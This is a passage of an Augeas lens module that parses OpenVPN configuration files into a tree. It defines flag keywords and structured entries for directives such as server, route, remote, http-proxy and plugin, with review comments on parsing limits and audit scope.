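   NOTE(review): key-direction is listed as a bare flag. The OpenVPN manual
   documents it with a direction argument, and flag_entry accepts nothing
   between the keyword and the end of line, so a line carrying the argument
   would not match here. Confirm and consider a valued entry instead. *)
let flag_words = "client-to-client"
               | "duplicate-cn"
               | "persist-key"
               | "persist-tun"
               | "client"
               | "remote-random"
               | "nobind"
               | "mute-replay-warnings"
               | "http-proxy-retry"
               | "socks-proxy-retry"
               | "remote-random-hostname"
               | "show-proxy-settings"
               | "float"
               | "bind"
               | "tun-ipv6"
               | "ifconfig-noexec"
               | "ifconfig-nowarn"
               | "route-noexec"
               | "route-nopull"
               | "allow-pull-fqdn"
               | "mtu-test"
               | "ping-timer-rem"
               | "persist-local-ip"
               | "persist-remote-ip"
               | "mlock"
               | "up-delay"
               | "down-pre"
               | "up-restart"
               | "disable-occ"
               | "errors-to-stderr"
               | "passtos"
               | "suppress-timestamps"
               | "fast-io"
               | "multihome"
               | "comp-noadapt"
               | "management-client"
               | "management-query-passwords"
               | "management-query-proxy"
               | "management-query-remote"
               | "management-forget-disconnect"
               | "management-hold"
               | "management-signal"
               | "management-up-down"
               | "management-client-auth"
               | "management-client-pf"
               | "push-reset"
               | "push-peer-info"
               | "disable"
               | "ifconfig-pool-linear"
               | "ccd-exclusive"
               | "tcp-nodelay"
               | "opt-verify"
               | "auth-user-pass-optional"
               | "client-cert-not-required"
               | "username-as-common-name"
               | "pull"
               | "key-direction"
               | "no-replay"
               | "no-iv"
               | "use-prediction-resistance"
               | "test-crypto"
               | "tls-server"
               | "tls-client"
               | "pkcs11-id-management"
               | "single-session"
               | "tls-exit"
               | "auth-nocache"
               | "show-ciphers"
               | "show-digests"
               | "show-tls"
               | "show-engines"
               | "genkey"
               | "mktun"
               | "rmtun"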


(* flag_entry kw
   Builds a node keyed by kw with no value. Nothing but an end of line or a
   trailing comment may follow the keyword. *)
let flag_entry (kw:regexp)
               = [ key kw . comment_or_eol ]

(* flag: any keyword from flag_words as a value-less node. *)
let flag       = flag_entry flag_words


(************************************************************************
 *                               OTHER FIELDS
 *
 *   - server        => IP IP [nopool]
 *   - server-bridge => IP IP IP IP
 *   - route	     => host host [host [num]]
 *   - push          => "string"
 *   - tls-auth      => filename [01]
 *   - remote        => hostname/IP [num] [(tcp|udp)]
 *   - management    => IP num filename
 *   - http-proxy    => host port [filename|keyword] [method]
 *   - http-proxy-option => (VERSION decimal|AGENT string)
 *   ...
 *   and many others
 *
 *************************************************************************)

(* server: address and netmask children (both stored via ip), plus an
   optional value-less nopool child. *)
let server          = [ key "server"
                      . sep . [ label "address" . ip ]
                      . sep . [ label "netmask" . ip ]
                      . (sep . [ key "nopool" ]) ?
                      . comment_or_eol
                      ]

(* server_bridge: either four address children (address, netmask, start,
   end) or the literal nogw stored as the value of the node itself. *)
let server_bridge =
    let ip_params = [ label "address" . ip ] . sep
        . [ label "netmask" . ip ] . sep
        . [ label "start"   . ip ] . sep
        . [ label "end"     . ip ] in
            [ key "server-bridge"
            . sep . (ip_params|store /(nogw)/)
            . comment_or_eol
            ]

(* route: an address, then optionally a netmask, then optionally a gateway,
   then optionally a metric. Each later argument can appear only if the
   previous one is present. Address and gateway accept the symbolic names
   vpn_gateway, net_gateway and remote_host in addition to host_re. *)
let route =
    let route_net_kw   = store (/(vpn_gateway|net_gateway|remote_host)/|host_re) in
        [ key "route" . sep
        . [ label "address" . route_net_kw ]
        . (sep . [ label "netmask" . store (ip_re|/default/) ]
            . (sep . [ label "gateway" . route_net_kw ]
                . (sep . [ label "metric" . store (/default/|num_re)] )?
            )?
        )?
        . comment_or_eol
        ]

(* route_ipv6: a network (symbolic name or address with prefix length),
   then optionally a gateway, then optionally a metric. The address parts
   rest on the permissive ipv6_re, so they are not validated here. *)
let route_ipv6 =
    let route_net_re = /(vpn_gateway|net_gateway|remote_host)/ in
        [ key "route-ipv6" . sep
        . [ label "network" . store (route_net_re|ipv6_bits_re) ]
        . (sep . [ label "gateway" . store (route_net_re|ipv6_re) ]
            . (sep . [ label "metric" . store (/default/|num_re)] )?
        )?
        . comment_or_eol
        ]

(* push: the directive text between double quotes becomes the value of the
   node. Quoting is handled by Quote.do_dquote; the text itself may be any
   characters other than a double quote or newline (sto_to_dquote), so the
   pushed directive is not parsed or checked by this lens. *)
let push =
  [ key "push" . sep
  . Quote.do_dquote sto_to_dquote
  . comment_or_eol
  ]

(* tls_auth: a key child holding the key file path and an is_client child
   holding 0 or 1. Both are required by this entry. *)
let tls_auth =
  let key_file  = [ label "key"       . filename     ] in
  let direction = [ label "is_client" . store /[01]/ ] in
    [ key "tls-auth" . sep . key_file . sep . direction . comment_or_eol ]

(* remote: a server child, optionally followed by a port child, which in
   turn may be followed by a proto child (tcp or udp). *)
let remote =
  let proto_opt = (sep . [label "proto" . proto]) ? in
  let port_opt  = (sep . [label "port" . port] . proto_opt) ? in
    [ key "remote" . sep
    . [ label "server" . host ]
    . port_opt
    . comment_or_eol
    ]

(* http_proxy: server and port children, then optionally an auth child and,
   after it, optionally an auth-method child (none, basic or ntlm). The auth
   value is matched with fn_safe_re, so it covers both a credentials file
   path and a keyword; where it is a path, that file is worth including in
   a permissions review. *)
let http_proxy =
    let auth_method_re = /(none|basic|ntlm)/ in
        let auth_method = store auth_method_re in
            [ key "http-proxy"
            . sep . [ label "server" . host ]
            . sep . [ label "port"   . port ]
            . (sep . [ label "auth" .  filename_safe ]
                . (sep . [ label "auth-method" . auth_method ]) ? )?
            . comment_or_eol
            ]

(* http_proxy_option: an option child (VERSION or AGENT) and a free-form
   value child stored via filename. *)
let http_proxy_option = [ key "http-proxy-option"
                        . sep . [ label "option" . store /(VERSION|AGENT)/ ]
                        . sep . [ label "value" . filename ]
                        . comment_or_eol
                        ]

(* socks_proxy: a server child, optionally a port child, and after the port
   optionally an auth child stored via filename_safe. *)
let socks_proxy     = [ key "socks-proxy"
                      . sep . [ label "server" . host ]
                      . (sep . [ label "port"   . port ]
                        . (sep . [ label "auth" .  filename_safe ])? )?
                      . comment_or_eol
                      ]

(* port_share: host and port children, plus an optional dir child. *)
let port_share      = [ key "port-share"
                      . sep . [ label "host" . host ]
                      . sep . [ label "port" . port ]
                      . (sep . [ label "dir" . filename ])?
                      . comment_or_eol
                      ]

(* route_delay: optional seconds child, optionally followed by a
   win-seconds child. The keyword alone is also accepted. *)
let route_delay     = [ key "route-delay"
                    . (sep . [ label "seconds" . num ]
                        . (sep . [ label "win-seconds" . num ] ) ?
                    )?
                    . comment_or_eol
                    ]

(* inetd: optional mode child (wait or nowait), optionally followed by a
   progname child. *)
let inetd           = [ key "inetd"
                    . (sep . [label "mode" . store /(wait|nowait)/ ]
                        . (sep . [ label "progname" . filename ] ) ?
                    )?
                    . comment_or_eol
                    ]

(* inactive: a required seconds child and an optional bytes child. *)
let inactive        = [ key "inactive"
                    . sep . [ label "seconds" . num ]
                    . (sep . [ label "bytes" . num ] ) ?
                    . comment_or_eol
                    ]

(* client_nat: type (snat or dnat), network, netmask and alias children,
   all required. *)
let client_nat      = [ key "client-nat"
                    . sep . [ label "type" . store /(snat|dnat)/ ]
                    . sep . [ label "network" . ip ]
                    . sep . [ label "netmask" . ip ]
                    . sep . [ label "alias" . ip ]
                    . comment_or_eol
                    ]

(* status: a file child and an optional repeat-seconds child. *)
let status          = [ key "status"
                    . sep . [ label "file" . filename_safe ]
                    . (sep . [ label "repeat-seconds" . num ]) ?
                    . comment_or_eol
                    ]

(* plugin: a file child naming the plugin module and an optional
   init-string child with free-form text. The module is code that OpenVPN
   loads, so the path stored here belongs on the list of files whose
   ownership and permissions an audit checks. The lens stores the path
   only. *)
let plugin          = [ key "plugin"
                    . sep . [ label "file" . filename_safe ]
                    . (sep . [ label "init-string" . filename ]) ?
                    . comment_or_eol
                    ]

(* management: server and port children, plus an optional pwfile child.
   The server value must match ip_re, so only address-shaped values parse.
   A management node without a pwfile child means the file configures the
   management interface with no password file. *)
let management    = [ key "management" . sep
                    . [ label "server" . ip ]
                    . sep . [ label "port" . port ]
                    . (sep . [ label "pwfile" . filename ] ) ?
                    . comment_or_eol
                    ]

(* auth_user_pass_verify: a command child and a method child (via-env or
   via-file). The command is what OpenVPN runs to check credentials; it is
   handled by Quote.quote_spaces, whose quoting rules live in the Quote
   module, and is not inspected by this lens. *)
let auth_user_pass_verify   = [ key "auth-user-pass-verify"
                              . sep . [ Quote.quote_spaces (label "command") ]
                              . sep . [ label "method" . store /via-(env|file)/ ]
                              . comment_or_eol
                              ]

(* static_challenge: a text child and an echo child holding 0 or 1. *)
let static_challenge    = [ key "static-challenge"
                          . sep . [ Quote.quote_spaces (label "text") ]
                          . sep . [ label "echo" . store /[01]/ ]
                          . comment_or_eol
                          ]

(* cryptoapicert: a double-quoted selector of the form NAME:value, where
   NAME is uppercase letters and becomes the key of the child node. *)
let cryptoapicert        = [ key "cryptoapicert" . sep . Quote.dquote
                          . [ key /[A-Z]+/ . Sep.colon . store /[A-Za-z _-]+/ ]
                          . Quote.dquote . comment_or_eol
                          ]

(* setenv: for setenv and setenv-safe, a child keyed by the variable name
   with the value stored via fn_re. The name pattern is one character that
   is not a hash, semicolon, slash, space, tab or newline, followed by one
   or more of letters, digits, underscore or hyphen, so names are at least
   two characters long. *)
let setenv =
    let envvar = /[^#;\/ \t\n][A-Za-z0-9_-]+/ in
        [ key ("setenv"|"setenv-safe")
        . sep . [ key envvar . sep . store fn_re ]
        . comment_or_eol
        ]

(* redirect: redirect-gateway or redirect-private followed by one or more
   flag children. At least one flag is required by this entry, so the bare
   keyword on its own line does not match. *)
let redirect =
    let redirect_flag   = /(local|autolocal|def1|bypass-dhcp|bypass-dns|block-local)/ in
        let redirect_key    = "redirect-gateway" | "redirect-private" in
            [ key redirect_key
            . (sep . [ label "flag" . store redirect_flag ] ) +
            . comment_or_eol
            ]

(* tls_cipher: a colon-separated list; every element becomes its own cipher
   child in order. The name pattern is letters, digits, exclamation mark,
   underscore and hyphen. Names are not checked against any list of known
   or acceptable suites. *)
let tls_cipher =
    let ciphername = /[A-Za-z0-9!_-]+/ in
        [ key "tls-cipher" . sep
        . [label "cipher" . store ciphername]
        . (Sep.colon . [label "cipher" . store ciphername])*
        . comment_or_eol
        ]

(* remote_cert_ku: one or more usage children, each one or two
   alphanumeric characters. *)
let remote_cert_ku =
    let usage = [label "usage" . store /[A-Za-z0-9]{1,2}/] in
        [ key "remote-cert-ku" . sep . usage . (sep . usage)* . comment_or_eol ]

(* FIXME: Surely there's a nicer way to do this *)
(* remote_cert_eku: either an oid child in dotted-number form or a symbol
   child with an optionally quoted name. *)
let remote_cert_eku =
    let oid = [label "oid" . store /[0-9]+\.([0-9]+\.)*[0-9]+/] in
        let symbolic = [Quote.do_quote_opt
            (label "symbol" . store /[A-Za-z0-9][A-Za-z0-9 _-]*[A-Za-z0-9]/)] in
            [ key "remote-cert-eku" . sep . (oid|symbolic) . comment_or_eol ]

(* status_version: the keyword with an optional number stored as the value
   of the node. *)
let status_version          = [ key "status-version"
                              . (sep . num) ?
                              . comment_or_eol
                              ]

(* ifconfig_pool: start and end children plus an optional netmask child. *)
let ifconfig_pool           = [ key "ifconfig-pool"
                              . sep . [ label "start" . ip ]
                              . sep . [ label "end" . ip ]
                              . (sep . [ label "netmask" . ip ])?
                              . comment_or_eol
                              ]

(* ifconfig_push: local and remote-netmask children plus an optional alias
   child. *)
let ifconfig_push           = [ key "ifconfig-push"
                              . sep . [ label "local" . ip ]
                              . sep . [ label "remote-netmask" . ip ]
                              . (sep . [ label "alias" . store /[A-Za-z0-9_-]+/ ] )?
                              . comment_or_eol
                              ]

(* ignore_unknown_option: one or more opt children, one per option name. *)
let ignore_unknown_option   = [ key "ignore-unknown-option"
                              . (sep . [ label "opt" . store /[A-Za-z0-9_-]+/ ] ) +
                              . comment_or_eol
                              ]

(* tls_version_min: the version is stored as the value of the node itself;
   an optional value-less or-highest child may follow. The version is any
   Rx.decimal, so the lens does not reject an outdated minimum. *)
let tls_version_min         = [ key "tls-version-min"
                              . sep . store Rx.decimal
                              . (sep . [ key "or-highest" ]) ?
                              . comment_or_eol
                              ]

(* crl_verify: the CRL path is stored as the value of the node itself; an
   optional value-less dir child may follow. *)
let crl_verify              = [ key "crl-verify"
                              . sep . filename_safe
                              . (sep . [ key "dir" ]) ?
                              . comment_or_eol
                              ]

(* x509_username_field: either an ext child holding a field name (written
   as ext, a colon, then the name) or a subj child holding the name. *)
let x509_username_field =
    let fieldname = /[A-Za-z0-9_-]+/ in
        let extfield = ([key /ext/ . Sep.colon . store fieldname]) in
            let subjfield = ([label "subj" . store fieldname]) in
                [ key "x509-username-field"
                . sep . (extfield|subjfield)
                . comment_or_eol
                ]

(* other: union of all entries with a structure of their own, as defined
   above. An option that is in none of comment, empty, single, single_opt,
   double, flag or other has no matching branch in lns. *)
let other   = server
            | server_bridge
            | route
            | push
            | tls_auth
            | remote
            | http_proxy
            | http_proxy_option
            | socks_proxy
            | management
            | route_delay
            | client_nat
            | redirect
            | inactive
            | setenv
            | inetd
            | status
            | status_version
            | plugin
            | ifconfig_pool
            | ifconfig_push
            | ignore_unknown_option
            | auth_user_pass_verify
            | port_share
            | static_challenge
            | tls_version_min
            | tls_cipher
            | cryptoapicert
            | x509_username_field
            | remote_cert_ku
            | remote_cert_eku
            | crl_verify
            | route_ipv6


(************************************************************************
 *                              LENS & FILTER
 *************************************************************************)

(* lns: the whole file is zero or more lines, each of which must match one
   of the entry kinds. The TODO in the module header says inline file
   support is missing, so configurations that embed key or certificate
   material inline are presumably not handled; confirm before using this
   lens on such files. *)
let lns    = ( comment | empty | single | single_opt | double | flag | other )*

(* filter: only these two paths are picked up by autoload. OpenVPN
   configurations stored under other names or in other directories are not
   loaded unless the caller adds them explicitly, so an inventory or audit
   driven by this filter alone sees at most these two files. *)
let filter = (incl "/etc/openvpn/client.conf")
           . (incl "/etc/openvpn/server.conf")

(* xfm: binds the lens to the filter; referenced by autoload at the top of
   the module. *)
let xfm = transform lns filter



